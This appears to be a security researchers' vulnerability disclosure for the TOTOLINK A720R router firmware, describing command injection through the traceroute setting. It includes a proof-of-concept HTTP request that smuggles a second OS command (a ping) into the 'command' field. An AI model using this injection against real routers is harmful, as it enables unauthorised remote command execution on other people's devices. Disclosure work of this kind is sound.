vendor:TOTOLINK
product:A720R;
version:A720R_Firmware(V4.1.5cu.470_B20200911)
type:Remote Command Execution
author:Jinwen Zhou、Yifeng Li、Yongjie Zheng
institution:potatso@scnu、feng@scnu、eifiz@scnu
We found an Command Injection vulnerability and buffer overflow vulnerability in TOTOLINK Technology router with firmware which was released recently,allows remote attackers to execute arbitrary OS commands from a crafted request.
In this function,command
is directly passed by the attacker, so we can control the command
to attack the OS.
We set the value of command
as -h\nping 1.1.1.1\n and the router will excute ping command,such as:
POST http://example.com/cgi-bin/cstecgi.cgi?action=s
{"topicurl":"setTracerouteCfg","command":"-h\nping 1.1.1.1\n","num":"500"}
or
or
By clicking below, you agree to our terms of service.
New to HackMD? Sign up
Syntax | Example | Reference | |
---|---|---|---|
# Header | Header | 基本排版 | |
- Unordered List |
|
||
1. Ordered List |
|
||
- [ ] Todo List |
|
||
> Blockquote | Blockquote |
||
**Bold font** | Bold font | ||
*Italics font* | Italics font | ||
~~Strikethrough~~ | |||
19^th^ | 19th | ||
H~2~O | H2O | ||
++Inserted text++ | Inserted text | ||
==Marked text== | Marked text | ||
[link text](https:// "title") | Link | ||
 | Image | ||
`Code` | Code |
在筆記中貼入程式碼 | |
```javascript var i = 0; ``` |
|
||
:smile: | ![]() |
Emoji list | |
{%youtube youtube_id %} | Externals | ||
$L^aT_eX$ | LaTeX | ||
:::info This is a alert area. ::: |
This is a alert area. |
On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?
Please give us some advice and help us improve HackMD.
Do you want to remove this version name and description?
Syncing